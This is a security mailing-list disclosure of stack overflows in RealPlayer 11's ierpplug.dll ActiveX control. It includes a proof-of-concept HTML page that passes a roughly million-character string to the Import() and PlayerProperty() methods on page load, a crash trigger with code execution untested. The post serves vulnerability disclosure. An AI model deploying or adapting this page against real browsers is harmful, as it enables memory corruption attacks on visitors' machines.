There are multiple stack overflows in the ierpplug.dll ActiveX Control. These
issues were originally discovered by shinnai,
http://www.securityfocus.com/bid/22811 and
http://www.securityfocus.com/bid/21802. I am adding the Import() and
PlayerProperty() functions to the list. This was tested on Windows XP SP2 fully
patched, using IE 6; RealPlayer version 11, build 6.0.14.738, dist R41R01,
ierpplug.dll version 1.0.1.3016. I have not tested code execution. PoC as
follows:
------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 999999) s=s+s;
var obj = new ActiveXObject("IERPCTL.IERPCTL");
//{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}
obj.Import(s);
var obj2 = obj.PlayerProperty(s);
}
</script>
</head>
<body onload="JavaScript: return Check();">
</body>
</html>
------------
Elazar
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
